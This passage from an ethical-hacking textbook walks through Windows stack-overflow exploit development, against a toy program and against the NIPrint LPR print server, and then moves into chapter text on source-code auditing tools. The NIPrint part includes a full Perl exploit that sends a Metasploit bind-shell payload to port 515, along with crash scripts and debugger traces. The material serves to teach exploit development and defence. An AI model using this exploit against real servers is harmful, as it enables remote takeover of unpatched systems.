"\x3d\xa9\xe6\xae\x58\xac\xad\x36\x1a\x19\xad\xdb\xb1\x5c\xa7\xa2".
"\xb7\x5f\x86\x5b\x8d\xc9\x49\xab\xc3\x78\xe6\xf0\x92\x9c\x86\xc9".
"\x3d\x91\x26\x24\xe9\x81\x6c\x44\x3d\x81\xe6\xae\x5d\x14\x31\x8b".
"\xb2\x5e\x5c\x6f\xd2\x16\x2d\x9f\x33\x5d\x15\xa3\x3d\xdd\x61\x24".
"\xc6\x81\xc0\x24\xde\x95\x86\xa6\x3d\x1d\xdd\xaf\xb6\x9d\xe6\xc7".
"\x8a\xc2\x5c\x59\xd6\xcb\xe4\x57\x35\x5d\x16\xff\xde\x72\xa3\x4f".
"\xd6\xf5\xf5\x51\x3c\x93\x3a\x50\x51\xfe\x0c\xc3\xd5\xb3\x08\xd7".
"\xd3\x9d\x6d\xaf";
# get_sp gave us 0x12ff60. Subtract 0x198 for buffer of 408 bytes
my $return_address = "\xC8\xFD\x12\x00";
my $nop_before = "\x90" x 24;
my $nop_after = "\x90" x 216;
my $payload = $nop_before.$shellcode.$nop_after.$return_address;
exec 'meet','Mr.',$payload
Notice that we have added thread-safe shellcode, regenerated from the Metasploit site.
C:\grayhat>Perl command.pl
C:\grayhat>Hello Mr. nV
Bye Mr. nV
… truncated for brevity …
The calculator popped up this time (without a crash)—success! To slow it down a bit
and gain experience with the debugger, change the last line of the script to:
exec 'c:\\debuggers\\ntsd', '-g', '-G', 'meet', 'Mr.', $payload;
Now start the program again.
C:\grayhat>Perl command.pl
NOTE If your debugger is not installed in c:\debuggers, you’ll need to change
the exec line in your script.
Voilà! Calc.exe pops up again after the debugger runs in the background. Let’s walk
through how to debug if something went wrong. First, take out the -g argument to ntsd
so you get an initial breakpoint from which you can set breakpoints. Your new exec line
should look like this:
exec 'c:\\debuggers\\ntsd', '-G', 'meet', 'Mr.', $payload;
Next run the script again, setting a breakpoint on meet!greeting.
C:\grayhat>Perl command.pl
...
Microsoft (R) Windows Debugger Version 6.6.0007.5
Copyright (C) Microsoft Corporation. All rights reserved.
CommandLine: meet Mr. t$s
nifÆ
…
0:000> uf meet!greeting
meet!greeting:
00401020 55 push ebp
00401021 8bec mov ebp,esp
00401023 81ec90010000 sub esp,0x190
00401029 8b450c mov eax,[ebp+0xc]
0040102c 50 push eax
0040102d 8d8d70feffff lea ecx,[ebp-0x190]
00401033 51 push ecx
00401034 e8f7000000 call meet!strcpy (00401130)
00401039 83c408 add esp,0x8
0040103c 8d9570feffff lea edx,[ebp-0x190]
00401042 52 push edx
00401043 8b4508 mov eax,[ebp+0x8]
00401046 50 push eax
00401047 68405b4100 push 0x415b40
0040104c e86f000000 call meet!printf (004010c0)
00401051 83c40c add esp,0xc
00401054 8be5 mov esp,ebp
00401056 5d pop ebp
00401057 c3 ret
There’s the disassembly. Let’s set a breakpoint at the strcpy and the ret to watch what
happens. (Remember, these are our memory addresses for the strcpy function and the
return. Be sure to use the values from your disassembly output.)
0:000> bp 00401034
0:000> bp 00401057
0:000> g
Breakpoint 0 hit
eax=00320de1 ebx=7ffdf000 ecx=0012fd3c edx=00320dc8 esi=7ffdebf8 edi=00000018
eip=00401034 esp=0012fd34 ebp=0012fecc iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000206
meet!greeting+0x14:
00401034 e8f7000000 call meet!strcpy (00401130)
0:000> k
ChildEBP RetAddr
0012fecc 00401076 meet!greeting+0x14
0012fedc 004013a0 meet!main+0x16
0012ffc0 77e7eb69 meet!mainCRTStartup+0x170
0012fff0 00000000 kernel32!BaseProcessStart+0x23
The stack trace looks correct before the strcpy.
0:000> p
eax=0012fd3c ebx=7ffdf000 ecx=00320f7c edx=fdfdfd00 esi=7ffdebf8 edi=00000018
eip=00401039 esp=0012fd34 ebp=0012fecc iopl=0 nv up ei pl zr na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246
meet!greeting+0x19:
00401039 83c408 add esp,0x8
0:000> k
ChildEBP RetAddr
0012fecc 0012fd44 meet!greeting+0x19
WARNING: Frame IP not in any known module. Following frames may be wrong.
90909090 00000000 0x12fd3c
And after the strcpy, we’ve overwritten the return value with the location of (hopefully)
our nop sled and subsequent shellcode. Let’s check to be sure:
0:000> db 0012fd44
0012fd44 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................
0012fd54 d9 ee d9 74 24 f4 5b 31-c9 b1 29 81 73 17 4b 98 ...t$.[1..).s.K.
0012fd64 fd 17 83 eb fc e2 f4 b7-70 ab 17 4b 98 ae 42 1d ........p..K..B.
0012fd74 cf 76 7b 6f 80 76 52 77-13 a9 12 33 99 17 9c 01 .v{o.vRw...3....
0012fd84 80 76 4d 6b 99 16 f4 79-d1 76 23 c0 99 13 26 b4 .vMk...y.v#...&.
0012fd94 64 cc d7 e7 a0 1d 63 4c-59 32 1a 4a 5f 16 e5 70 d.....cLY2.J_..p
0012fda4 e4 d9 03 3e 79 76 4d 6f-99 16 71 c0 94 b6 9c 11 ...>yvMo..q.....
0012fdb4 84 fc fc c0 9c 76 16 a3-73 ff 26 8b c7 a3 4a 10 .....v..s.&...J.
Yep, that’s one line of nops and then our shellcode. Let’s continue on to the end of the
function. When it returns, we should jump to our shellcode that launches calc.
0:000> g
Hello Mr. t$s
n [snip]
Breakpoint 1 hit
eax=000001a2 ebx=7ffdf000 ecx=00415b90 edx=00415b90 esi=7ffdebf8 edi=00000018
eip=00401057 esp=0012fed0 ebp=90909090 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000206
meet!greeting+0x37:
00401057 c3 ret
0:000> p
eax=000001a2 ebx=7ffdf000 ecx=00415b90 edx=00415b90 esi=00080178 edi=00000000
eip=0012fd44 esp=0012fed4 ebp=90909090 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000206
0012fd44 90 nop
0:000>
Looks like the beginning of a nop sled! When we continue, up pops calc. If calc did
not pop up for you, a small adjustment to your offset will likely fix the problem. Poke
around in memory until you find the location of your shellcode and point the return
address at that memory location.
Real-World Windows Exploit Example
In this section, we will use OllyDbg and Metasploit to build on the previously learned
Linux exploit development process. We will teach you how to go from a basic vulnerability
advisory to a basic proof of concept exploit.
Exploit Development Process Review
As you recall from the previous chapters, the exploit development process is
• Control eip
• Determine the offset(s)
• Determine the attack vector
• Build the exploit sandwich
• Test the exploit
• Debug the exploit if needed
NIPrint Server
The NIPrint server is a network printer daemon that receives print jobs via the
platform-independent printing protocol called LPR. In 2003, an advisory warned of a
buffer overflow vulnerability that might be triggered by sending more than 60 bytes to
TCP port 515.
At this point we will set up the vulnerable 4.x NIPrint™ server on a VMWare™ guest virtual
machine. We will use VMWare because it allows us to start, stop, and restart our virtual
machine much more quickly than rebooting.
CAUTION Since we are running a vulnerable program, the safest way to
conduct testing is to place the virtual Network Interface Card (NIC) of
VMWare™ in “host only” mode. This will ensure that no outside machines
can connect to our vulnerable virtual machine. See VMWare documentation
for more information.
Inside the virtual machine, install and start the NIPrint server from the start menu.
After the program launches, you will need to configure the program as shown to make it
accept network calls.
Now that the printer is running, you need to determine the IP of the vulnerable server
and ping the vulnerable virtual machine from the host machine. In our case, the vulnerable
virtual machine is located at 10.10.10.130.
Next, inside the virtual machine, open OllyDbg and attach it to the vulnerable program
by selecting File | Attach. Select the NIPRINT3 server and click the Attach button to
start the debugger.
Once the debugger starts, you will need to press F9 to “continue” the debugger.
At this point (with the debugger running on a vulnerable server), it is suggested that
you save the state of the VMWare™ virtual machine by saving a snapshot. After the snapshot
is complete, you may return to this point by simply reverting the snapshot. This
trick will save you valuable testing time as you may skip all of the previous setup and
reboots on subsequent iterations of testing.
Control eip
Open up the Metasploit shell and create a small Perl script to verify the vulnerability of
the server.
$string = "A" x 60;
open(NC, "|nc.exe 10.10.10.130 515");
print NC $string;
close(NC);
REMEMBER Change the IP to match your vulnerable server.
When you launch the Perl script, you should see the server crash as the debugger
catches an exception and pauses. The lower-right corner of the debugger will turn yellow
and say “Paused”. It is often useful to place your attack window so you can still view the
lower-right corner of OllyDbg in order to see the debugger pause.
As you can see, we have controlled eip by overwriting it with 0x41414141.
Determine the Offset(s)
Revert to the snapshot of your virtual machine and resend a 60-byte pattern (generated
with Metasploit PatternCreate as described in Chapter 7).
$string =
"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5" .
"Ac6Ac7Ac8Ac9Ad0Ad1Ad2A";
open(NC, "|nc.exe 10.10.10.130 515");
print NC $string;
close(NC);
NOTE The pattern string is a continuous line; formatting on this page caused
a carriage return.
This time, as expected, the debugger catches an exception and the value of eip contains
the value of a portion of the pattern. Also, notice that the stack pointer (esp) contains
a portion of the pattern.
Use the Metasploit patternOffset.pl program to determine the offset of eip and esp.
For illustrative purposes, we have displayed the register section beside the stack section.
In this particular case, we can see that after 49 bytes of the buffer, we overwrite eip
from bytes 50–53. Then, one word later, at byte 54, the rest of the buffer can be found at
the top of the stack after the program crashes. Notice how the patternOffset.pl tool
reports the location before the pattern starts.
Determine the Attack Vector
On Windows systems, the stack resides in the lower memory addresses. This presents a
problem with the Aleph1 attack technique we used in Linux exploits. Unlike the canned
scenario of the meet.exe program, for real-world exploits, we cannot simply overwrite
eip with a return address on the stack. The address will certainly contain a 0x00 at the
beginning and cause us problems as we pass that NULL byte to the vulnerable program.
On Windows systems, you will have to find another attack vector. You will often find
a portion if not all of your buffer in one of the registers when a Windows program
crashes. As seen in the last section, we control the area of the stack where the program
crashes. All we need to do is place our shellcode beginning at byte 54 and then overwrite
eip with an opcode to “jmp esp” or “call esp” at bytes 50–53. We chose this attack vector
because either of those opcodes will place the value of esp into eip and execute it.
To find the address of that opcode in our binary, we remember that ntdll.dll is
dynamically loaded into our program at runtime. We can look inside that DLL and others
if necessary by searching the Metasploit opcode database at
http://metasploit.com/users/opcode/msfopcode.cgi?wizard=opcode&step=1
We will choose the first one: “call esp” at 0x77f510b0. Remember that for later.
NOTE This attack vector will not always work. You will have to look at
registers and work with what you’ve got. For example, you may have to “jmp
eax” or “jmp esi”.
Before crafting the exploit sandwich, we should determine the amount of buffer
space available in which to place our shellcode. The easiest way to do this is to throw lots
of As at the program and manually inspect the stack after the program crashes. You can
determine the depth of the buffer we control by clicking in the stack section of the
debugger after the crash and scrolling down to the bottom of the current stack frame and
determining where the As end.
$string = "A" x 500;
open(NC, "|nc.exe 10.10.10.130 515");
print NC $string;
close(NC);
Subtract the value of esp at the time of the crash from the address where the As end and
you will have the total space available for shellcode. You can tell by the result (440 bytes
of available space + the original 53 bytes is close to 500) that we could have chosen a
number larger than 500 to test and still have been successful; however, 440 is plenty for
us and we will proceed to the next stage.
NOTE You will not always have the space you need. Sometimes you only have
5–10 bytes, then some important value may be in the way. Beyond that, you
may have more space. When you encounter a situation like this, use a short
jump such as “EB06”, which will jump 6 bytes forward. A short jump takes a
signed 8-bit offset, so this trampoline technique can reach up to 127 bytes
forward or 128 bytes backward.
Build the Exploit Sandwich
We are ready to get some shellcode. Fire up the Metasploit web interface and browse to
http://127.0.0.1:55555/PAYLOADS
or use the online Metasploit payload generator at
http://www.metasploit.com:55555/PAYLOADS
Then select Windows Bind Shell and add Restricted Characters of 0x00, leave LPORT=
4444, and click the Generate Payload button.
Your shellcode will be provided in the right-hand window. Copy and paste that
shellcode into a test program, compile it, and test it. You may have to respond to your
firewall if you have one.
Great! We have a working shellcode that binds to port 4444.
Test the Exploit
Finally, we can craft the exploit sandwich.
# win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub
#http://metasploit.com
my $shellcode =
"\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x97".
"\xf3\x28\x19\x83\xeb\xfc\xe2\xf4\x6b\x99\xc3\x54\x7f\x0a\xd7\xe6".
"\x68\x93\xa3\x75\xb3\xd7\xa3\x5c\xab\x78\x54\x1c\xef\xf2\xc7\x92".
"\xd8\xeb\xa3\x46\xb7\xf2\xc3\x50\x1c\xc7\xa3\x18\x79\xc2\xe8\x80".
"\x3b\x77\xe8\x6d\x90\x32\xe2\x14\x96\x31\xc3\xed\xac\xa7\x0c\x31".
"\xe2\x16\xa3\x46\xb3\xf2\xc3\x7f\x1c\xff\x63\x92\xc8\xef\x29\xf2".
"\x94\xdf\xa3\x90\xfb\xd7\x34\x78\x54\xc2\xf3\x7d\x1c\xb0\x18\x92".
"\xd7\xff\xa3\x69\x8b\x5e\xa3\x59\x9f\xad\x40\x97\xd9\xfd\xc4\x49".
"\x68\x25\x4e\x4a\xf1\x9b\x1b\x2b\xff\x84\x5b\x2b\xc8\xa7\xd7\xc9".
"\xff\x38\xc5\xe5\xac\xa3\xd7\xcf\xc8\x7a\xcd\x7f\x16\x1e\x20\x1b".
"\xc2\x99\x2a\xe6\x47\x9b\xf1\x10\x62\x5e\x7f\xe6\x41\xa0\x7b\x4a".
"\xc4\xa0\x6b\x4a\xd4\xa0\xd7\xc9\xf1\x9b\x39\x45\xf1\xa0\xa1\xf8".
"\x02\x9b\x8c\x03\xe7\x34\x7f\xe6\x41\x99\x38\x48\xc2\x0c\xf8\x71".
"\x33\x5e\x06\xf0\xc0\x0c\xfe\x4a\xc2\x0c\xf8\x71\x72\xba\xae\x50".
"\xc0\x0c\xfe\x49\xc3\xa7\x7d\xe6\x47\x60\x40\xfe\xee\x35\x51\x4e".
"\x68\x25\x7d\xe6\x47\x95\x42\x7d\xf1\x9b\x4b\x74\x1e\x16\x42\x49".
"\xce\xda\xe4\x90\x70\x99\x6c\x90\x75\xc2\xe8\xea\x3d\x0d\x6a\x34".
"\x69\xb1\x04\x8a\x1a\x89\x10\xb2\x3c\x58\x40\x6b\x69\x40\x3e\xe6".
"\xe2\xb7\xd7\xcf\xcc\xa4\x7a\x48\xc6\xa2\x42\x18\xc6\xa2\x7d\x48".
"\x68\x23\x40\xb4\x4e\xf6\xe6\x4a\x68\x25\x42\xe6\x68\xc4\xd7\xc9".
"\x1c\xa4\xd4\x9a\x53\x97\xd7\xcf\xc5\x0c\xf8\x71\x67\x79\x2c\x46".
"\xc4\x0c\xfe\xe6\x47\xf3\x28\x19";
# sub esp, 4097 + inc esp makes stack happy by making
# space for decoding, often used on windows exploits
$prepend = "\x81\xc4\xff\xef\xff\xff\x44";
$string = "A" x 49;
$string .= "\xb0\x10\xf5\x77"; # the address of the call esp
$string .=$prepend."\xcc".$shellcode;
open(NC, "|nc.exe 10.10.10.130 515");
print NC $string;
close(NC);
NOTE The use of the $prepend variable is a neat trick used for
Windows shellcode to make room on the stack for the decoder to properly
decode the shellcode without tromping on the payload (which happens from time
to time). You will often find this in Metasploit Windows exploits. Add this
trick to your exploit toolkit.
Debug the Exploit if Needed
It’s time to reset the virtual system and launch the preceding script. You should see the
debugger pause because of the \xcc. After you press F9 to continue, you may see the program
crash.
If your program crashes, chances are you have a bad character in your shellcode. This
happens from time to time as the vulnerable program may react to certain characters
and may cause your exploit to abort or be otherwise modified.
To find the bad character, you will need to look at the memory dump of the debugger
and match that memory dump with the actual shellcode you sent across the network. To
set up this inspection, you will need to revert the virtual system and resend the attack
script. This time, step through the program until the shellcode is executed (just after
the vulnerable function returns). You may also just press F9 and let the program
pause at the “\xcc”. At that point, right-click on the eip register and select Follow in
Dump to view a hex memory dump of the shellcode. The easiest way to compare the two is
to pull up your shellcode in a text window and reformat it by placing 8 bytes per line.
Then you can lay that text window alongside the debugger and visually inspect for differences
between what you sent and what resides in memory.
As you can see, in this case the byte just after “0x7F”, the “0x0a” byte, was translated to
“0x00” and probably caused the rest of the damage. To test this theory, regenerate
shellcode and designate the “0x0a” byte as a badchar.
Modify the attack script and repeat the debugging process until the exploit successfully
completes and you can connect to a shell on port 4444.
NOTE You may have to repeat this process of looking for bad characters
many times until your code executes properly. In general, you will want to
exclude the null byte and the common white space and control characters:
0x00, 0x20, 0x0a, 0x0d, 0x1b, 0x0b, 0x0c.
When this works successfully in the debugger, you may remove the “\xcc” from your
shellcode (best to just replace it with a “\x90” to keep the current alignment) and try again.
When everything works right, you may close the debugger and restart the service to try again.
Success! We have demonstrated the Windows exploit development process on a real-world
exploit.
Vulnerability Analysis
■ Chapter 12 Passive Analysis
■ Chapter 13 Advanced Static Analysis with IDA
■ Chapter 14 Advanced Reverse Engineering
■ Chapter 15 Client Side Browser Exploits
■ Chapter 16 Abusing Weak ACLs for Local EoP
■ Chapter 17 Intelligent Fuzzing with Sulley
■ Chapter 18 From Vulnerability to Exploit
■ Chapter 19 Closing the Holes: Mitigation
CHAPTER 12 Passive Analysis
• Why reverse engineering is a useful skill
• Reverse engineering considerations
• Source code auditing tools
• The utility of source code auditing tools
• Manual source code auditing
• Manual auditing of binaries
• Automated binary analysis tools
What is reverse engineering? At the highest level it is simply taking a product apart to
understand how it works. You might do this for many reasons, among them:
• Understanding the capabilities of the product’s manufacturer
• Understanding the functions of the product in order to create compatible
components
• Determining whether vulnerabilities exist in a product
• Determining whether an application contains any undocumented functionality
Many different tools and techniques have been developed for reverse engineering
software. We focus here on those tools and techniques that are most helpful in revealing
flaws in software. This chapter discusses “static,” also called passive, reverse engineering
techniques in which you will attempt to discover vulnerabilities simply by
examining source or compiled code in order to discover potential flaws. In following
chapters, we will discuss more active means of locating software problems and how to
determine whether those problems can be exploited.
Ethical Reverse Engineering
Where does reverse engineering fit in for the ethical hacker? Reverse engineering is often
viewed as the craft of the cracker who uses her skills to remove copy protection from
software or media. As a result, you might be hesitant to undertake any reverse engineering
effort. The Digital Millennium Copyright Act (DMCA) is often brought up whenever
reverse engineering of software is discussed. In fact, reverse engineering is addressed
specifically in the anti-circumvention provisions of the DMCA (section 1201(f)). We
will not debate the merits of the DMCA here, but will note that there continue to be
instances in which it is wielded to prevent publication of security-related information
obtained through the reverse engineering process (see the following “References” section).
It is worth remembering that exploiting a buffer overflow in a network server is a
bit different than cracking a Digital Rights Management (DRM) scheme protecting an
MP3 file. You can reasonably argue that the first situation steers clear of the DMCA while
the second lands right in the middle of it. When dealing with copyrighted works,
remember there are two sections of the DMCA that are of primary concern to the ethical
hacker, sections 1201(f) and 1201(j). Section 1201(f) addresses reverse engineering in
the context of learning how to interoperate with existing software, which is not what you
are after in a typical vulnerability assessment. Section 1201(j) addresses security testing
and relates more closely to the ethical hacker’s mission in that it becomes relevant when
you are reverse engineering an access control mechanism. The essential point is that you
are allowed to conduct such research as long as you have the permission of the owner of
the subject system and you are acting in good faith to discover and secure potential vulnerabilities.
Refer to Chapter 2 for a more detailed discussion of the DMCA.
References
Digital Millennium Copyright Act http://thomas.loc.gov/cgi-bin/query/z?c105:H.R.2281.ENR:
DMCA Related Cases www.eff.org/IP/DMCA/
Why Reverse Engineering?
With all of the other techniques covered in this book, why would you ever want to resort
to something as tedious as reverse engineering? You should be interested in reverse engineering
if you want to extend your vulnerability assessment skills beyond the use of the
pen tester’s standard bag of tricks. It doesn’t take a rocket scientist to run Nessus and
report its output. Unfortunately, such tools can only report on what they know. They
can’t report on undiscovered vulnerabilities and that is where your skills as a reverse
engineer come into play. If you want to move beyond the standard features of Canvas or
Metasploit and learn how to extend them effectively, you will probably want to develop
at least some rudimentary reverse engineering skills. Vulnerability researchers use a variety
of reverse engineering techniques to find new vulnerabilities in existing software.
You may be content to wait for the security community at large to discover and publicize
vulnerabilities for the more common software components that your pen-test client
happens to use. But who is doing the work to discover problems with the custom,
web-enabled payroll application that Joe Coder in the accounting department developed
and deployed to save the company money? Possessing some reverse engineering skills
will pay big dividends whether you want to conduct a more detailed analysis of popular
software, or whether you encounter those custom applications that some organizations
insist on running.
Reverse Engineering Considerations
Vulnerabilities exist in software for any number of reasons. Some people would say that
they all stem from programmer incompetence. While there are those who have never
seen a compiler error, let he who has never dereferenced a null pointer cast the first
stone. In actuality, the reasons are far more varied and may include
• Failure to check for error conditions
• Poor understanding of function behaviors
• Poorly designed protocols
• Improper testing for boundary conditions
CAUTION Uninitialized pointers contain unknown data. Null pointers have
been initialized to point to nothing so that they are in a known state. In C/
C++ programs, attempting to access data (dereferencing) through either
usually causes a program to crash or, at minimum, to behave unpredictably.
As long as you can examine a piece of software, you can look for problems such as
those just listed. How easy it will be to find those problems depends on a number of factors.
Do you have access to the source code for the software? If so, the job of finding vulnerabilities
may be easier because source code is far easier to read than compiled code.
How much source code is there? Complex software consisting of thousands (perhaps
tens of thousands) of lines of code will require significantly more time to analyze than
smaller, simpler pieces of software. What tools are available to help you automate some
or all of this source code analysis? What is your level of expertise in a given programming
language? Are you familiar with common problem areas for a given language?
What happens when source code is not available and you only have access to a compiled
binary? Do you have tools to help you make sense of the executable file? Tools such as
disassemblers and decompilers can drastically reduce the amount of time it takes to
audit a binary file. In the remainder of this chapter, we will answer all of these questions
and attempt to familiarize you with some of the reverse engineer’s tools of the trade.
Source Code Analysis
If you are fortunate enough to have access to an application’s source code, the job of
reverse engineering the application will be much easier. Make no mistake, it will still be
a long and laborious process to understand exactly how the application accomplishes
each of its tasks, but it should be easier than tackling the corresponding application
binary. A number of tools exist that attempt to automatically scan source code for
known poor programming practices. These can be particularly useful for larger applications.
Just remember that automated tools tend to catch common cases and provide no
guarantee that an application is secure.
Source Code Auditing Tools
Many source code auditing tools are freely available on the Internet. Some of the more
common ones include ITS4, RATS, FlawFinder, and Splint. Microsoft now offers its
PREfast tool as part of its Visual Studio 2005 Team Edition, or with the freely downloadable
Windows 2003 Driver Development Kit (DDK). On the commercial side, several
vendors offer dedicated source code auditing tools that integrate into several common
development environments such as Eclipse and Visual Studio. The commercial tools
range in price from several thousand dollars to tens of thousands of dollars.
ITS4, RATS, and FlawFinder all operate in a fairly similar manner. Each one consults a
database of poor programming practices and lists all of the danger areas found in
scanned programs. In addition to known insecure functions, RATS and FlawFinder
report on the use of stack allocated buffers and cryptographic functions known to incorporate
poor randomness. RATS alone has the added capability that it can scan Perl, PHP,
and Python code, as well as C code.
For demonstration purposes, we will take a look at a file named find.c, which implements
a UDP-based remote file location service. We will take a closer look at the source
code for find.c later. For the time being, let’s start off by running find.c through RATS.
Here we ask RATS to list input functions, output only default and high-severity warnings,
and use a vulnerability database named rats-c.xml.
# ./rats -i -w 1 -d rats-c.xml find.c
Entries in c database: 310
Analyzing find.c
find.c:46: High: vfprintf
Check to be sure that the non-constant format string passed as argument 2 to
this function call does not come from an untrusted source that could have
added formatting characters that the code is not prepared to handle.
find.c:119: High: fixed size local buffer
find.c:164: High: fixed size local buffer
find.c:165: High: fixed size local buffer
find.c:166: High: fixed size local buffer
find.c:167: High: fixed size local buffer
find.c:172: High: fixed size local buffer
find.c:179: High: fixed size local buffer
find.c:547: High: fixed size local buffer
Extra care should be taken to ensure that character arrays that are allocated
on the stack are used safely. They are prime targets for buffer overflow
attacks.
find.c:122: High: sprintf
find.c:513: High: sprintf
Check to be sure that the format string passed as argument 2 to this function
call does not come from an untrusted source that could have added formatting
characters that the code is not prepared to handle. Additionally, the format
string could contain '%s' without precision that could result in a buffer
overflow.
find.c:524: High: system
Argument 1 to this function call should be checked to ensure that it does not
come from an untrusted source without first verifying that it contains
nothing dangerous.
find.c: 610: recvfrom
Double check to be sure that all input accepted from an external data source
does not exceed the limits of the variable being used to hold it. Also make
sure that the input cannot be used in such a manner as to alter your program's
behavior in an undesirable way.
Total lines analyzed: 638
Total time 0.000859 seconds
742724 lines per second
We are informed of a number of stack allocated buffers, and pointed to a couple of
function calls for further, manual investigation. It is generally easier to fix these problems
than it is to determine if they are exploitable and under what circumstances. For
find.c, it turns out that exploitable vulnerabilities exist at both sprintf() calls, and the
buffer declared at line 172 can be overflowed with a properly formatted input packet.
However, there is no guarantee that all potentially exploitable code will be located by
such tools. For larger programs, the number of false positives increases and the usefulness
of the tool for locating vulnerabilities decreases. It is left to the tenacity of the auditor
to run down all of the potential problems.
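The vfprintf and sprintf warnings in the RATS output come down to who controls the format string. The following is a minimal C sketch of that issue. The names log_msg() and log_user_text() are hypothetical, chosen for illustration, and are not taken from find.c; the only library call assumed is the standard vsnprintf().

```c
#include <stdarg.h>
#include <stddef.h>
#include <stdio.h>

/* Hypothetical logging helper: forwards its format argument to vsnprintf().
 * Whoever supplies fmt decides how the remaining arguments are interpreted. */
int log_msg(char *out, size_t out_size, const char *fmt, ...)
{
    va_list args;
    va_start(args, fmt);
    int n = vsnprintf(out, out_size, fmt, args);
    va_end(args);
    return n;
}

/* Safer use: untrusted text is passed as data to a constant "%s" format,
 * so any formatting characters it contains are copied, not interpreted. */
int log_user_text(char *out, size_t out_size, const char *untrusted)
{
    return log_msg(out, out_size, "%s", untrusted);
}
```

Calling log_msg(out, size, untrusted) directly would instead hand the untrusted text to vsnprintf() as the format itself, which is the pattern the warning describes.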
Splint is a derivative of the C semantic checker Lint, and as such generates significantly
more information than any of the other tools. Splint will point out many types of programming
problems, such as use of uninitialized variables, type mismatches, potential memory
leaks, use of typically insecure functions, and failure to check function return values.
CAUTION Many programming languages allow the programmer to ignore the
values returned by functions. This is a dangerous practice as function return values
are often used to indicate error conditions. Assuming that all functions complete
successfully is another common programming problem that leads to crashes.
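As a small illustration of the habit this caution recommends, the C sketch below checks every return value that can signal failure. Both helper names, dup_string() and file_size(), are hypothetical and exist only for this example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical helper: duplicate a string, reporting allocation failure to
 * the caller instead of assuming that malloc() always succeeds. */
char *dup_string(const char *src)
{
    size_t len = strlen(src) + 1;   /* include the terminating null */
    char *copy = malloc(len);
    if (copy == NULL) {             /* malloc() signals failure with NULL */
        return NULL;
    }
    memcpy(copy, src, len);
    return copy;
}

/* Hypothetical helper: return the size of a file in bytes, or -1 if any
 * step fails. Each library call is checked before its result is used. */
long file_size(const char *path)
{
    FILE *fp = fopen(path, "rb");
    if (fp == NULL) {
        return -1;
    }
    long size = -1;
    if (fseek(fp, 0L, SEEK_END) == 0) {
        size = ftell(fp);           /* ftell() returns -1L on failure */
    }
    if (fclose(fp) != 0) {
        size = -1;
    }
    return size;
}
```

A caller is then expected to test for NULL or -1 before continuing, rather than assuming success.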
In scanning for security-related problems, the major difference between Splint and
the other free tools is that Splint recognizes specially formatted comments embedded in
the source files that it scans. Programmers can use Splint comments to convey information
to Splint concerning things such as pre- and postconditions for function calls.
While these comments are not required for Splint to perform an analysis, their presence
can improve the accuracy of Splint’s checks. Splint recognizes a large number of
command-line options that can turn off the output of various classes of errors. If you are
interested in strictly security-related issues, you may need to use several options to cut
down on the size of Splint’s output.
Microsoft’s PREfast tool has the advantage of very tight integration within the Visual
Studio suite. Enabling the use of PREfast for all software builds is a simple matter of
enabling code analysis within your Visual Studio properties. With code analysis enabled,
source code is analyzed automatically each time you attempt to build it, and warnings and
recommendations are reported inline with any other build-related messages. Typical messages
report the existence of a problem, and in some cases make recommendations for fixing
each problem. Like Splint, PREfast supports an annotation capability that allows
Chapter 12: Passive Analysis
281
PART IV
programmers to request more detailed checks from PREfast through the specification of
pre- and postconditions for functions.
NOTE Preconditions are a set of one or more conditions that must be true
upon entry into a particular portion of a program. Typical preconditions might
include the fact that a pointer must not be NULL, or that an integer value
must be greater than zero. Postconditions are a set of conditions that must hold
upon exit from a particular section of a program. These often include statements regarding
expected return values and the conditions under which each value might occur.
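To make the idea concrete, here is a minimal C sketch that states a function’s preconditions and postcondition with the standard assert() macro. This is only a stand-in: Splint and PREfast each use their own annotation syntax, which is not reproduced here, and the function max_of() is a hypothetical example.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical example: return the largest of the first count values. */
int max_of(const int *values, size_t count)
{
    /* Preconditions: the pointer must not be NULL and the count must be
     * greater than zero. */
    assert(values != NULL);
    assert(count > 0);

    int result = values[0];
    for (size_t i = 1; i < count; i++) {
        if (values[i] > result) {
            result = values[i];
        }
    }

    /* Postcondition: no element exceeds the value being returned. */
    for (size_t i = 0; i < count; i++) {
        assert(values[i] <= result);
    }
    return result;
}
```

Unlike tool annotations, which are checked statically, these assertions are checked only at run time and disappear when the program is compiled with NDEBUG defined.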
One of the drawbacks to using PREfast is that it may require substantial effort to use
with projects that have been created on Unix-based platforms, effectively eliminating it
as a scanning tool for such projects.
The Utility of Source Code Auditing Tools
It is clear that source code auditing tools can focus developers’ eyes on problem areas in
their code, but how useful are they for an ethical hacker? The same output is available to
both the white hat and the black hat hacker, so how is each likely to use the information?
The White Hat Point of View
The goal of a white hat reviewing the output of a source code auditing tool should be to
make the software more secure. If we trust that these tools accurately point to problem
code, it will be in the white hat’s best interest to spend her time correcting the problems
noted by these tools. It requires far less time to convert a strcpy() to a strncpy() than it
does to backtrack through the code to determine if that same strcpy() is exploitable. The
use of strcpy() and similar functions does not by itself make a program exploitable.
NOTE The strcpy() function is dangerous because it copies data into a
destination buffer without any regard for the size of the buffer and therefore
may overflow the buffer. One of the inputs to the strncpy() function is the
maximum number of characters to be copied into the destination buffer.
Programmers who understand the details of strcpy() will often conduct testing to
validate any parameters that will be passed to such functions. Programmers who do not
understand the details of these exploitable functions often make assumptions about the
format or structure of input data. While changing strcpy() to strncpy() may prevent a
buffer overflow, it also has the potential to truncate data, which may have other consequences
later in the application.
CAUTION The strncpy() function can still prove dangerous. Nothing
prevents the caller from passing an incorrect length for the destination buffer,
and under certain circumstances, the destination string may not be properly
terminated with a null character.
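One common way to guard against the missing terminator is to reserve the last byte of the destination and set it explicitly. The C sketch below assumes a hypothetical wrapper named copy_string(); it is one possible approach, not a prescribed fix.

```c
#include <stddef.h>
#include <string.h>

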